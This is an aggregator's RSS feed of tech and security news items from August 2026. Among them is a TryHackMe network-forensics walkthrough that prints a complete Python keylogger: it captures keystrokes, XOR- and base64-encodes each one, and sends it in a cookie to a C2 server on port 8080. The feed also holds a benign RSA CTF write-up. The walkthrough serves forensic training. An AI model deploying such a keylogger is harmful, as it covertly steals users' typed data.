<title><![CDATA[The Rise of the 1 am Job Interview]]></title>
<description><![CDATA[An AI interview is increasingly the first step of a hiring process. Since there’s no human on the other end, candidates are scheduling them whenever—even deep into the night.]]></description>
<link>https://tsecurity.de/de/3714244/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714244/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:05:04 +0200</pubDate>
<content:encoded><![CDATA[An AI interview is increasingly the first step of a hiring process. Since there’s no human on the other end, candidates are scheduling them whenever—even deep into the night.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI professors are negotiating the new realities of academic research]]></title>
<description><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Last week, I headed 30 miles south of San Francisco to a hotel in Mountain View, California, to join some of the most accomplished, and some of the most promis...]]></description>
<link>https://tsecurity.de/de/3714205/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714205/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:04:51 +0200</pubDate>
<content:encoded><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Last week, I headed 30 miles south of San Francisco to a hotel in Mountain View, California, to join some of the most accomplished, and some of the most promising, AI…]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Muse Glimmer brings local AI agents to consumer GPUs]]></title>
<description><![CDATA[Meta is releasing Muse Glimmer under an Apache 2.0 licence for local AI agents that can run on a consumer GPU. The company’s  Superintelligence Labs has released the 30-billion-parameter model’s weights on Hugging Face. Meta says developers can use it for local coding, function calling, local age...]]></description>
<link>https://tsecurity.de/de/3714202/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714202/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:04:42 +0200</pubDate>
<content:encoded><![CDATA[<p>Meta is releasing Muse Glimmer under an Apache 2.0 licence for local AI agents that can run on a consumer GPU. The company’s  Superintelligence Labs has released the 30-billion-parameter model’s weights on Hugging Face. Meta says developers can use it for local coding, function calling, local agents, and LLM-as-a-judge evaluation. The release targets an operational […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/meta-muse-glimmer-local-ai-agents-consumer-gpus/">Meta Muse Glimmer brings local AI agents to consumer GPUs</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Effectively Deploy Code With Claude Code]]></title>
<description><![CDATA[Learn how to optimize your CI/CD pipeline for coding agents
The post How to Effectively Deploy Code With Claude Code appeared first on Towards Data Science.]]></description>
<link>https://tsecurity.de/de/3714193/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714193/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:04:33 +0200</pubDate>
<content:encoded><![CDATA[<p>Learn how to optimize your CI/CD pipeline for coding agents</p>
<p>The post <a href="https://towardsdatascience.com/how-to-effectively-deploy-code-with-claude-code/">How to Effectively Deploy Code With Claude Code</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built StreamWriter Studio with Claude Code in three months, and now it's generating revenue]]></title>
<description><![CDATA[How indie developer went from a nostalgic idea to a published, paying Mac app in three months, with Claude Code as his coding partner]]></description>
<link>https://tsecurity.de/de/3714012/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714012/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:02:11 +0200</pubDate>
<content:encoded><![CDATA[How indie developer went from a nostalgic idea to a published, paying Mac app in three months, with Claude Code as his coding partner]]></content:encoded>
</item>
<item>
<title><![CDATA[26 more games join GeForce NOW during August 2026]]></title>
<description><![CDATA[NVIDIA have announced the next set of games coming to their cloud gaming service GeForce NOW for August 2026.Read the full article on GamingOnLinux.]]></description>
<link>https://tsecurity.de/de/3714005/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714005/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:02:08 +0200</pubDate>
<content:encoded><![CDATA[NVIDIA have announced the next set of games coming to their cloud gaming service GeForce NOW for August 2026.<p><img src="https://www.gamingonlinux.com/uploads/articles/tagline_images/165463240id29517gol.webp" alt></p><p>Read the full article on <a href="https://www.gamingonlinux.com/2026/08/26-more-games-join-geforce-now-during-august-2026/">GamingOnLinux</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kosten und Emissionen mit Refurbished-Hardware senken]]></title>
<description><![CDATA[Kosten und Emissionen mit Refurbished-Hardware senken

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Mo., 10.08.2026 - 07:00


            Bis zu 50 Prozent Kostenersparnis, bis zu 80 Prozent weniger CO2, un...]]></description>
<link>https://tsecurity.de/de/3713937/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713937/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:01:00 +0200</pubDate>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Kosten und Emissionen mit Refurbished-Hardware senken</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/it-administrator-interview-refurbished-hardware-kosten-emissionen-senken"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/ita-interview-refurbished-hardware_3.jpg?itok=bmz4Jxvs" width="480" height="319" alt='Thumbnail zum IT-Administrator-Interview "Refurbished-Hardware für Großunternehmen": Die Porträts von Thomas Gros und Christian Brakensiek vor einem Rechenzentrum-Hintergrund mit stilisiertem Kreislauf-Symbol, oben links das IT-Administrator-Logo.' title="Thomas Gros (Circulee) und Christian Brakensiek (CHG Meridian) im Gespräch mit dem IT-Administrator über Nutzungsmodelle und den wachsenden Markt für generalüberholte Enterprise-Hardware." typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-08-10T07:00:00+02:00" title="Montag, August 10, 2026 - 07:00" class="datetime">Mo., 10.08.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Bis zu 50 Prozent Kostenersparnis, bis zu 80 Prozent weniger CO2, und trotzdem zögern sieben von zehn Unternehmen noch immer beim Einstieg: Im aktuellen IT-Administrator-Interview erklären zwei Marktexperten, warum sich das gerade ändert und was Beschaffungsverantwortliche jetzt konkret tun sollten.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/it-administrator-interview-refurbished-hardware-kosten-emissionen-senken" rel="tag" title="Kosten und Emissionen mit Refurbished-Hardware senken" hreflang="en">Weiterlesen<span class="visually-hidden"> über Kosten und Emissionen mit Refurbished-Hardware senken</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v0.32.7]]></title>
<description><![CDATA[Muse Glimmer

Note: Muse Glimmer is currently available via initial support via Ollama's MLX engine on Apple Silicon. Additional support and optimizations for Apple Silicon, NVIDIA, AMD, and other platforms will be available in the coming days.

Muse Glimmer, Meta's newest open model and the firs...]]></description>
<link>https://tsecurity.de/de/3713928/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713928/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:00:37 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>Muse Glimmer</h2>

<p>Note: Muse Glimmer is currently available via initial support via Ollama's MLX engine on Apple Silicon. Additional support and optimizations for Apple Silicon, NVIDIA, AMD, and other platforms will be available in the coming days.</p>

<p><strong>Muse Glimmer</strong>, Meta's newest open model and the first released by Meta Superintelligence Labs, is now available on Ollama. It's a 30B multimodal model purpose-built for agent workloads that run locally.</p>
<p>With Ollama, you can now use Muse Glimmer to power coding agent applications such as Claude Code, Codex, Pi and more, as well as long-running personal assistants such as OpenClaw and Hermes.</p>
<p>Ollama's MLX engine provides state-of-the-art performance on Apple Silicon for this model, with support for DFlash and image input as of Ollama 0.32.7.</p>
<p>To download and run Muse Glimmer locally:</p>
<pre>ollama run muse-glimmer:30b-mlx</pre>
<p>To run Muse Glimmer on Apple Silicon with Claude Code, <a href="https://ollama.com/download" rel="nofollow">download Ollama</a> and run:</p>
<pre>ollama launch claude --model muse-glimmer:30b-mlx</pre>
<p>For a lighter-weight coding agent, try <a href="https://pi.dev/" rel="nofollow">Pi</a>:</p>
<pre>ollama launch pi --model muse-glimmer:30b-mlx</pre>
<p>For personal assistant frameworks such as OpenClaw and Hermes, use:</p>
<pre>ollama launch openclaw --model muse-glimmer:30b-mlx</pre>
<pre>ollama launch hermes --model muse-glimmer:30b-mlx</pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox Tooling Announcements: Firefox Profiler Deployment (August 10, 2026)]]></title>
<description><![CDATA[The latest version of the Firefox Profiler is now live! Check out the full changelog below to see what’s changed:
Highlights:

[fatadel] Improve discoverability of downloading a local profile (#6216)
[Nazım Can Altınova] Add the ability to apply source maps from the CLI (#6229)

Other Changes:

[...]]></description>
<link>https://tsecurity.de/de/3713870/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713870/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:59:38 +0200</pubDate>
<content:encoded><![CDATA[<p>The latest version of the <a href="https://profiler.firefox.com/" rel="noopener nofollow ugc">Firefox Profiler</a> is now live! Check out the full changelog below to see what’s changed:</p>
<p><strong>Highlights:</strong></p>
<ul>
<li>[fatadel] Improve discoverability of downloading a local profile (<a href="https://github.com/firefox-devtools/profiler/pull/6216" rel="noopener nofollow ugc">#6216</a>)</li>
<li>[Nazım Can Altınova] Add the ability to apply source maps from the CLI (<a href="https://github.com/firefox-devtools/profiler/pull/6229" rel="noopener nofollow ugc">#6229</a>)</li>
</ul>
<p><strong>Other Changes:</strong></p>
<ul>
<li>[fatadel] Create the Network track from the timeline-network schema display location (<a href="https://github.com/firefox-devtools/profiler/pull/6224" rel="noopener nofollow ugc">#6224</a>)</li>
<li>[Markus Stange] Only call <code>getRawFrameTableBuilderWithExistingContents</code> once per symbolication batch. (<a href="https://github.com/firefox-devtools/profiler/pull/6233" rel="noopener nofollow ugc">#6233</a>)</li>
<li>[Nazım Can Altınova] Handle the cli daemon startup failures more gracefully with better errors (<a href="https://github.com/firefox-devtools/profiler/pull/6241" rel="noopener nofollow ugc">#6241</a>)</li>
<li>[Nazım Can Altınova] Handle Text and Log marker payloads with their marker schema (<a href="https://github.com/firefox-devtools/profiler/pull/6247" rel="noopener nofollow ugc">#6247</a>)</li>
<li>[Nazım Can Altınova] Bump the Gecko profile version to make sure that the Text and Log marker changes are picked up in the frontends (<a href="https://github.com/firefox-devtools/profiler/pull/6252" rel="noopener nofollow ugc">#6252</a>)</li>
<li>[fatadel] Deactivate a menu button as soon as its panel is dismissed (<a href="https://github.com/firefox-devtools/profiler/pull/6251" rel="noopener nofollow ugc">#6251</a>)</li>
<li>[Nazım Can Altınova] <img alt=":clockwise_vertical_arrows:" class="emoji" height="20" src="https://emoji.discourse-cdn.com/twitter/clockwise_vertical_arrows.png?v=15" title=":clockwise_vertical_arrows:" width="20"> Sync: l10n → main (August 10, 2026) (<a href="https://github.com/firefox-devtools/profiler/pull/6253" rel="noopener nofollow ugc">#6253</a>)</li>
<li>[Nazım Can Altınova] Bump profiler-cli version to 0.8.0 (<a href="https://github.com/firefox-devtools/profiler/pull/6254" rel="noopener nofollow ugc">#6254</a>)</li>
</ul>
<p>Big thanks to our amazing localizers for making this release possible:</p>
<ul>
<li>de: Ger</li>
<li>de: Michael Köhler</li>
<li>el: George kitsoukakis</li>
<li>en-CA: chutten</li>
<li>en-CA: Saurabh</li>
<li>en-GB: Ian Neal</li>
<li>es-CL: ravmn</li>
<li>fy-NL, nl: Fjoerfoks</li>
<li>fr: Théo Chevalier</li>
<li>fy-NL: Fjoerfoks</li>
<li>ia: Melo46</li>
<li>it: Francesco Lodolo [:flod]</li>
<li>nl: Fjoerfoks</li>
<li>ru: michellemelsspam</li>
<li>ru: Valery Ledovskoy</li>
<li>tr: giray</li>
<li>tr: Selim Şumlu</li>
<li>zh-TW: Pin-guang Chen</li>
</ul>
<p>Find out more about the Firefox Profiler on <a href="https://profiler.firefox.com/" rel="noopener nofollow ugc">profiler.firefox.com</a>! If you have any questions, join the discussion on our <a href="https://chat.mozilla.org/#/room/%23profiler:mozilla.org" rel="noopener nofollow ugc">Matrix channel</a>!</p>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://discourse.mozilla.org/t/firefox-profiler-deployment-august-10-2026/149143">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatBots erzählen zu oft Unsinn: Interview mit dem BRAIN-Entwickler Heiko Janicke]]></title>
<description><![CDATA[BRAIN ist eine kostenlose wie lokale KI-Plattform, bei der keine Daten abfließen. Wir haben uns kürzlich mit ihrem Entwickler unterhalten.
Der Artikel ChatBots erzählen zu oft Unsinn: Interview mit dem BRAIN-Entwickler Heiko Janicke erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3713781/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713781/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:59:04 +0200</pubDate>
<content:encoded><![CDATA[<p>BRAIN ist eine kostenlose wie lokale KI-Plattform, bei der keine Daten abfließen. Wir haben uns kürzlich mit ihrem Entwickler unterhalten.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/interviews/chatbots-erzaehlen-zu-oft-unsinn-interview-mit-dem-brain-entwickler-heiko-janicke-332271.html">ChatBots erzählen zu oft Unsinn: Interview mit dem BRAIN-Entwickler Heiko Janicke</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe: Packed Light (Hacker Holidays Day 04) Walkthrough]]></title>
<description><![CDATA[In this forensic challenge, we are to investigate a network traffic capture (.pcapng) to discover a covert communication channel being used to exfiltrate sensitive data off a guest network.Below is a detailed, step-by-step walkthrough of the thought process, tools, and commands used to solve Pack...]]></description>
<link>https://tsecurity.de/de/3713773/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713773/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:58:55 +0200</pubDate>
<content:encoded><![CDATA[<p>In this forensic challenge, we are to investigate a network traffic capture (.pcapng) to discover a covert communication channel being used to exfiltrate sensitive data off a guest network.</p><p>Below is a detailed, step-by-step walkthrough of the thought process, tools, and commands used to solve <strong>Packed Light</strong>.</p><h3>1. Initial Recon &amp; Analyzing Room Clues</h3><p>Before touching the capture file, I begin by carefully reading the room briefing and social post hint provided on the platform:</p><blockquote><strong><em>Briefing:</em></strong><em> </em>“Tiny packets. Odd hours. Suspiciously regular. Someone’s smuggling out the data equivalent of a hotel towel every night, folded neatly inside traffic that looks ordinary until you decode it.”</blockquote><blockquote><strong><em>@0xMia’s Story Hint:</em></strong><em> </em>“not me watching my laptop ping some random :8080 address every single second like clockwork 🚩 the request headers are giving ‘not a real app’ ngl also what is with the crypto 😭”</blockquote><h3>Key Takeaways from the Clues:</h3><ol><li><strong>Destination Port:</strong> Traffic is heading to port 8080.</li><li><strong>Frequency:</strong> Packets are sent continuously at short, fixed intervals (classic beaconing / keylogging behavior).</li><li><strong>Data Location:</strong> The exfiltrated data resides inside <strong>HTTP Headers</strong> (or cookies) rather than standard POST bodies.</li><li><strong>Encoding/Encryption:</strong> The payload is encrypted or encoded before transmission.</li></ol><h3>2. Inspecting the Traffic in Wireshark</h3><p>After downloading the capture file (traffic.pcapng), we open it inside <strong>Wireshark</strong>.</p><h3>Step 2.1: Applying the Display Filter</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uRKcID47-GTqL5WajEy_ig.png"></figure><p>Using the hint about port 8080, we apply a Wireshark filter to isolate relevant HTTP requests:</p><pre>http &amp;&amp; tcp.port == 8080</pre><h3>Step 2.2: Inspecting the First HTTP Stream</h3><p>Selecting the very first HTTP packet in the filtered view, we right-click and choose <strong>Follow → HTTP Stream</strong>.</p><p>Instead of finding simple background telemetry, the HTTP response returns the actual source code of the running malware script!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pv3GEdojAE-MzATIWGFGWw.png"></figure><pre>import requests<br>import base64<br>from pynput import keyboard</pre><pre>C2_URL = "http://byte-lotus-hotel.thm:8080/"</pre><pre>def getkey():<br>    p1 = "H0t3lSt@ff0Nly"<br>    p2 = "K3epS3cr3t!"<br>    return p1 + p2</pre><pre>def xor(data: bytes, key: bytes) -&gt; bytes:<br>    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))</pre><pre>def sendltr(character):<br>    raw_bytes = character.encode('utf-8')<br>    encrypted = xor(raw_bytes, getkey().encode('utf-8'))<br>    <br>    b64_string = base64.b64encode(encrypted).decode('utf-8')<br>    <br>    headers = {<br>        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ByteLotusClient/1.1",<br>        "Cookie": f"hotel_sess_state={b64_string}"<br>    }    <br>    try:<br>        requests.get(C2_URL, headers=headers, timeout=0.5)<br>    except:<br>        pass</pre><pre>def on_press(key):<br>    try:<br>        sendltr(key.char)<br>    except AttributeError:<br>        if key == keyboard.Key.space:<br>            sendltr(" ")<br>        elif key == keyboard.Key.enter:<br>            sendltr("\n")</pre><pre>print("[*] Byte Lotus Sync Service started...")<br>with keyboard.Listener(on_press=on_press) as listener:<br>    listener.join()</pre><h3>3. Deconstructing the Malware Logic</h3><p>Analyzing the recovered Python script gives us complete visibility into how the exfiltration operates:</p><ol><li><strong>Mechanism:</strong> It uses pynput.keyboard to capture keystrokes locally.</li><li><strong>Encryption:</strong> Each individual character (sendltr) is passed to an xor() function along with a combined key:</li><li>"H0t3lSt@ff0Nly" + "K3epS3cr3t!" = "H0t3lSt@ff0NlyK3epS3cr3t!"</li><li><strong>Encoding &amp; Carrier:</strong> The encrypted byte is converted to Base64 and embedded into an HTTP Cookie header as hotel_sess_state=&lt;base64_val&gt;.</li><li><strong>Implementation Flaw:</strong> Because sendltr() passes a single character (len(data) == 1) to xor() on every keystroke, enumerate(data) <strong>always</strong> indexes i = 0. Thus, every single character is XOR-encrypted strictly against the <strong>first character</strong> of the key: 'H' (ord('H') == 72).</li></ol><h3>4. Automated Extraction with tshark</h3><p>Now that we know where the payload lives, we extract all hotel_sess_state cookie values sequentially using tshark from the terminal:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/968/1*TJsgbnnwHygAuv20p1vbmw.png"></figure><pre>tshark -r traffic.pcapng -Y 'http.cookie contains "hotel_sess_state"' -T fields -e http.cookie</pre><h3>Command Output:</h3><pre>hotel_sess_state=HA==<br>hotel_sess_state=AA==<br>hotel_sess_state=BQ==<br>hotel_sess_state=Mw==<br>hotel_sess_state=Hg==<br>hotel_sess_state=ew==<br>hotel_sess_state=Og==<br>hotel_sess_state=fA==<br>.......</pre><h3>5. Reassembling &amp; Decrypting the Flag</h3><p>Using the extracted Base64 tokens and our understanding of the single-byte XOR implementation, we write a Python script to reverse the operation:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/879/1*yxOfqg8Fgsdh3Z0_p5BDUg.png"></figure><pre>import base64<br># Base64-encoded cookie chunks extracted from the PCAP<br>cookies = [<br>    "HA==","AA==","BQ==","Mw==","Hg==","ew==","Og==","fA==","Fw==","eQ==",<br>    "Ow==","Fw==","Pw==","fA==","PA==","Kw==","IA==","eQ==","Jg==","Lw==",<br>    "Fw==","eA==","Pg==","LQ==","Gg==","Fw==","MQ==","eA==","PQ==","NQ=="<br>]<br><br># The single character key used due to the single-byte chunk size<br>key_char = ord("H")<br><br>decrypted_chars = []<br>for c in cookies:<br>    # 1. Base64 decode to get raw byte<br>    enc_byte = base64.b64decode(c)<br>    # 2. XOR with key character 'H'<br>    dec_byte = enc_byte[0] ^ key_char<br>    # 3. Convert back to ASCII character<br>    decrypted_chars.append(chr(dec_byte))<br><br>print("".join(decrypted_chars))</pre><h3>Execution &amp; Result:</h3><p>Running the script successfully reconstructs the exfiltrated keylogger sequence and outputs the target THM{...} flag!</p><h3>Conclusion</h3><p>This room offers a great practical exercise in network forensics and basic code analysis. By combining Wireshark filtering, CLI extraction via tshark, and reversing the malware's encoding scheme in Python, we efficiently identified the covert channel and recovered the flag.</p><p>Submit your flag and earn a Raffle ticket . Happy Hacker Holidays.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vKzLz9i9iOmQS1HesiToGA.png"></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a4c45b84e1b7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-packed-light-hacker-holidays-day-04-walkthrough-a4c45b84e1b7">TryHackMe: Packed Light (Hacker Holidays Day 04) Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[BYUCTF RSA Dreams Cybersecurity Writeup 2026]]></title>
<description><![CDATA[Let’s solve this RSA cryptography challenge together!Challenge Analysis:We are given the output file and code:c = 5074616349947930347771128443869249667723941019037011379843932659330729580197593522845748676276068149443504037403162962894625104017380398816152166168830833n = 6452268004013779272669102...]]></description>
<link>https://tsecurity.de/de/3713774/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713774/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:58:55 +0200</pubDate>
<content:encoded><![CDATA[<p><strong>Let’s solve this RSA cryptography challenge together!</strong></p><figure><img alt="BYUCTF 2026 cryptography RSA writeup" src="https://cdn-images-1.medium.com/max/1024/0*1B37l6cc-pOlw13x.png"></figure><h4><strong>Challenge Analysis:</strong></h4><p>We are given the output file and code:</p><pre>c = 5074616349947930347771128443869249667723941019037011379843932659330729580197593522845748676276068149443504037403162962894625104017380398816152166168830833<br>n = 6452268004013779272669102227661703532150635430524568657091997086066784917218113937677647594597481724133073200003104968955173212323278046973034541033497147<br>e = 65537<br>hint = 161697499284577475400347684012866511237569864647822807778480533925514941939388</pre><pre>from Crypto.Util.number import getPrime<br>from Crypto.Util.number import bytes_to_long<br><br>flag = b"REDACTED"<br><br>p = getPrime(256)<br>q = getPrime(256)<br>n = p*q<br>hint = p + q<br>e = 0x10001<br><br>c = pow(bytes_to_long(flag), e, n)<br><br>print(f"c = {c}")<br>print(f"n = {n}")<br>print(f"e = {e}")<br>print(f"hint = {hint}")</pre><p>The variable “hint” is composed of p and q being added. Since this is RSA, we also know that we need p and q to be multiplied in order to get the value of n. Luckily, we have the value of n; so we can plug these numbers into an equation to find p and q.</p><p>But before we get to the decryption, let’s understand how RSA works.</p><h4><strong>RSA Encryption:</strong></h4><p><strong>RSA </strong>is an asymmetric encryption where two keys are used (a private and public key). It is secure because RSA uses the mathematical difficulty of factoring very big problems.</p><p><strong>Key Terms:</strong></p><ul><li><strong>Prime numbers:</strong> Numbers that can be divided by itself and one.</li><li><strong>Modulo (mod):</strong> It finds the remainder after dividing it one number by another.</li><li><strong>Euler’s Totient Function(ϕ): </strong>If n is the product of two primes (p and q), then ϕ(n)=(p−1)(q−1). For instance, ϕ(91) = (7−1)(13−1) = (6)(12) = 72.</li><li><strong>Coprime:</strong> Two numbers are coprime if their GCD is 1. For instance, 8 and 15 are coprime. Factors of 8: 1,2,4,8. Factors of 15: 1,3,5,15. The greatest common factor they both share is 1.</li><li><strong>Modular Inverse:</strong> Given numbers <strong>a</strong> and <strong>m</strong>, the modular inverse of<strong> a</strong> is a number <strong>b</strong> such that: <strong>(a×b) mod m=1.</strong> For instance: The modular inverse of 3 mod 11 is 4, since (3×4) mod 11 = 12 mod 11 = 1.</li></ul><p>RSA is encrypted by:</p><pre>p = 61 <br>q = 53<br><br>// Now we will multiply the primes<br>n = p x q<br>n = 61×53 = 3233<br><br>// Now we will calculate Euler's Totient Function<br>ϕ(n) = (p−1)(q−1)<br>ϕ(3233)=(61−1)(53−1)=60×52=3120<br><br>// Now we have to find a public exponent <br>// "e", in such that  1 &lt; e &lt; φ(n), is coprime with ϕ(n), are <br>// commonly chosen as a small prime (like 3, 5, 17, 257, 65537):<br>e = 17<br><br>// Now we will calculate the private exponent d<br>d × e = 1(modϕ(n))<br>d × 17 = 1(mod3120)  /*3120 found from step 3  */<br><br>d = 2753<br><br>// Lastly, we will encrypt this by doing: <br>C = plaintext^e  (mod n)</pre><p>Now we understand how RSA works, so let’s solve this challenge!</p><h4>Decryption:</h4><p>In order to decrypt this RSA, we need to find the values of p and q.</p><p>We know:</p><pre> n = p * q <br> and<br> hint = p + q</pre><p>So we will do the equation: x² + <em>hint</em>x + n. The positive and negative values of x resemble the values of p and q.</p><p>Now, we can plug the values into the code shown below.</p><pre># RSA.py<br>from Crypto.Util.number import inverse, long_to_bytes<br><br>n = 6452268004013779272669102227661703532150635430524568657091997086066784917218113937677647594597481724133073200003104968955173212323278046973034541033497147<br>e = 65537<br>c = 5074616349947930347771128443869249667723941019037011379843932659330729580197593522845748676276068149443504037403162962894625104017380398816152166168830833<br><br>p = 71669843677648724047578634482796162927151697026318521175318409958080978797761<br>q = 90027655606928751352769049530070348310418167621504286603162123967433963141627<br><br>phi = (p - 1) * (q - 1)<br>d = inverse(e, phi)<br><br># To decrypt: c^d mod n = m<br>m = pow(c, d, n)<br>print(long_to_bytes(m))</pre><p>We got the flag 🥳: byuctf{great_job_recovering_the_flag}</p><p>If you want to learn more about cybersecurity, check out one of my articles about Google Dorking! <a href="https://medium.com/bugbountywriteup/12-must-know-google-dorking-commands-in-2026-9c8538c313c9">https://medium.com/bugbountywriteup/12-must-know-google-dorking-commands-in-2026-9c8538c313c9</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3525d1a1d83c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/byuctf-rsa-dreams-writeup-2026-3525d1a1d83c">BYUCTF RSA Dreams Cybersecurity Writeup 2026</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thanks for Another Great DEF CON!]]></title>
<description><![CDATA[DEF CON 34 has wrapped up, and it’s been another amazing one.

    Thanks to the amazing DEF CON Community for bringing the good energy, curiosity and enthuiasm that makes this little desert shindig so special.  From the old heads who remember why we have a dialer and a floppy disk in our logo to...]]></description>
<link>https://tsecurity.de/de/3713739/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713739/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:58:35 +0200</pubDate>
<content:encoded><![CDATA[<p><img src="https://defcon.org/images/defcon-34/dc-34-logo-transparent.webp" alt="DEF CON 34 logo"> </p>

    <p>DEF CON 34 has wrapped up, and it’s been another amazing one.<br><br>

    Thanks to the amazing DEF CON Community for bringing the good energy, curiosity and enthuiasm that makes this little desert shindig so special.  From the old heads who remember why we have a dialer and a floppy disk in our logo to the brandest new newbies, you are an amazing tribe of humans. Thank you for sharing your passions, making connections and looking out for each other.<br><br>

    Special thanks to the army of Goons who make this big machine go. A happening like this takes a lot of skilled and patient hands, and we’re eternally grateful to our top-shelf crew.<br><br>

    It’s gonna be another year until DEF CON 35, but take heart. There are DEF CON Groups you can join to keep the vibes going all year. If there’s not one near you, maybe it’s time to think about starting one. Consider sharing your talent with the DEF CON Franklin Project. Stay engaged. The days will fly by.<br><br>

    We’re already thinking of ways to top this year, and we can’t wait to see what you lovable scamps get up to  in the off season.<br><br>

    See you soon,everyone.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI says Astra could reach ‘critical’ cyber capability, tightens safeguards]]></title>
<description><![CDATA[OpenAI said its upcoming model Astra is showing cybersecurity capabilities that could reach its highest risk category, where a system can autonomously find and exploit vulnerabilities or carry out end-to-end cyberattacks against hardened targets.



The company disclosed the assessment following ...]]></description>
<link>https://tsecurity.de/de/3713650/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3713650/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 00:56:51 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI said its upcoming model Astra is showing cybersecurity capabilities that could reach its highest risk category, where a system can autonomously find and exploit vulnerabilities or carry out end-to-end cyberattacks against hardened targets.</p>



